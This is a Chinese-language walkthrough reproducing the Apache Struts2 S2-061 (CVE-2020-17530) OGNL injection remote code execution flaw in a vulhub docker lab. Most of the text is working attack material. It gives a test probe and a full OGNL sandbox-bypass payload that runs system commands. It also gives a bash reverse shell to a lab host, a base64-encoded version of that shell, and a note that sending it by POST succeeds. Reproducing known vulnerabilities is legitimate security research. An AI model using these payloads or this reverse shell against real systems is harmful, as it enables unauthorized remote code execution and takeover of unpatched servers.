s2介绍
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
S2-061是对S2-059沙盒进行的绕过。
影响版本
Apache Struts 2.0.0 - 2.5.25
工具
使用vulhub下的docker镜像复现。
漏洞复现
手工测试确定漏洞点在id参数处。
payload=http://192.168.171.135:8080/?id=%{'tets'+(2000+20).toString()}
下一步获取使用id指令。
payload=?id=%25{(%23instancemanager%3d%23application['org.apache.tomcat.InstanceManager']).(%23stack%3d%23request['struts.valueStack']).(%23bean%3d%23instancemanager.newInstance('org.apache.commons.collections.BeanMap')).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get('context')).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get('memberAccess')).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance('java.util.HashSet')).(%23bean.put('excludedClasses',%23emptyset)).(%23bean.put('excludedPackageNames',%23emptyset)).(%23arglist%3d%23instancemanager.newInstance('java.util.ArrayList')).(%23arglist.add('id')).(%23execute%3d%23instancemanager.newInstance('freemarker.template.utility.Execute')).(%23execute.exec(%23arglist))}
shell反弹
bash -i >& /dev/tcp/192.168.171.129/8888 0>&1
base64编码后:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}
使用get方式,发现总是反弹不成功,但是使用post方法,可以成功反弹。
反弹payload之所以要经过bash64转码是因为,包含空格以及一些特殊字符的参数可能会被破坏,因此需要经过转码。
反弹成功。
参考连接
转码连接:https://x.hacking8.com/java-runtime.html
(CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞【复现】:https://blog.csdn.net/qq_45742511/article/details/115405250?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-115405250-blog-111052971.pc_relevant_recovery_v2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-115405250-blog-111052971.pc_relevant_recovery_v2&utm_relevant_index=2